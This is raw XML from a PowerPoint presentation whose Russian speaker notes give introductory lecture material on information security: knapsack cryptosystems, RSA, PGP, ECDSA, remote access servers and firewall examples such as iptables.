              <a:t>Задача о ранце (рюкзаке) — одна из задач комбинаторной оптимизации. Название это получила от максимизационной задачи укладки как можно большего числа нужных вещей в рюкзак при условии, что общий объём (или вес) всех предметов ограничен. Подобные задачи часто возникают в экономике, прикладной математике, криптографии. В общем виде, задачу можно сформулировать так: из неограниченного множества предметов со свойствами «стоимость» и «вес», требуется отобрать некое число предметов таким образом, чтобы получить максимальную суммарную стоимость при одновременном соблюдении ограничения на суммарный вес.</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Первая рюкзачная криптосистема была предложена в работе Меркля и Хеллмана в 1978 году. Их идея сразу привлекла многих криптографов во всем мире, так как предложенная схема была легко реализуема и имела высокую скорость работы. Однако в последствии практически все рюкзачные криптосистемы были взломаны.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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Поскольку преимущества шифрования с открытым</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ключом очевидны, многие исследователи неустанно работали над созданием по-</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добных алгоритмов, и некоторые из них уже опубликованы. Один хороший метод</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был разработан группой исследователей Массачусетского технологического ин-</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ститута (Rivest и др., 1978). Он назван по начальным буквам фамилий трех разра-</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ботчиков: RSA (Rivest, Shamir, Adleman). Этот метод вот уже четверть века вы-</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держивает попытки взлома и считается очень прочным. На его основе построены</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многие практические системы безопасности. Главный недостаток RSA заключа-</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ется в том, что для обеспечения достаточного уровня защищенности требуется</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ключ длиной, по крайней мере, 1024 бита (против 128 бит в алгоритмах с симмет-</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ричными ключами). Из-за этого алгоритм работает довольно медленно.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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PGP (англ. Pretty Good Privacy) — компьютерная программа, позволяющая выполнять операции шифрования (кодирования) и цифровой подписи сообщений, файлов и другой информации, представленной в электронном виде. Первоначально разработана Филиппом Циммерманном в 1991 году.</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Пользователь PGP создаёт ключевую пару: открытый и закрытый ключ. При генерации ключей задаются их владелец (Имя и адрес электронной почты), тип ключа, длина ключа и срок его действия.</a:t>
            </a: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PGP поддерживает три типа ключей RSA v4, RSA legacy (v3) и Diffie-Hellman/DSS (Elgamal в терминологии GnuPG).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ECDSA (Elliptic Curve Digital Signature Algorithm) — алгоритм с открытым ключом для создания электронной подписи, аналогичный по своему строению RSA, но определённый в отличие от него не над полем целых чисел, а над полем точек эллиптической кривой.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide6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1" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>RAS – Remote access server</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide6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3" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>На картинке «самая абсурдная защита замка в истории варваров»</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide6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5" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Примеры:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>iptables (встроены в ядро Linux), Windows firewall, Outpost firewall</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solid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1.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2.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3.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Титульный слайд">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8"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sldNum" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{2D5AA009-A5CF-41A9-B429-7961A0AB0CBA}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="2"/>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ъект с подписью">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{36F7F85B-D354-40E1-98B4-56F6B08AA0EE}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="20"/>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Рисунок с подписью">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{C95B5B24-257F-4964-BE36-FABE0FCCA98E}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="22"/>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Обычный">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89"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sldNum" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{7A670E2A-5499-4310-AC49-74C18EB197FF}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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Обычный 1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{E14F8507-9DF9-4F50-AF82-9147A5663445}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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Обычный 2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{1E77659A-492D-46B5-89CC-9A4EED2C3F30}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="28"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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Обычный 3">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11"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 name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="29"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{3C08B977-C214-4A58-8B28-1F5E630F3E34}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="30"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="31"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{93B767B4-060A-4C1A-9063-1AE530BFDAE1}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="32"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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Обычный 5">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28"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29"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sldNum" idx="33"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{1679E03E-5B86-45FD-BF6A-A82BB83D1109}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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6">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="35"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{B6A8ECD9-89F6-43F1-90AA-B8B86C097B82}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="36"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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Обычный 7">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 name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="37"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{CC1195A8-ABE4-418E-8079-1C3C671511F3}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="38"/>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Заголовок и вертикальный текст">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{49F1D941-6ED6-4A46-B1FF-D98BF21848F9}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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8">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="39"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{399E2E1B-0006-4F72-AC5C-1D7D6D43D9DF}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="40"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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9">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="41"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{368CEBA8-564C-43A1-95AE-8460234E694E}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="42"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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10">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="43"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{C2E88DEC-916B-4B33-AC7F-D4BB0AFCD1AF}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="44"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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Обычный 11">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69"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sldNum" idx="45"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
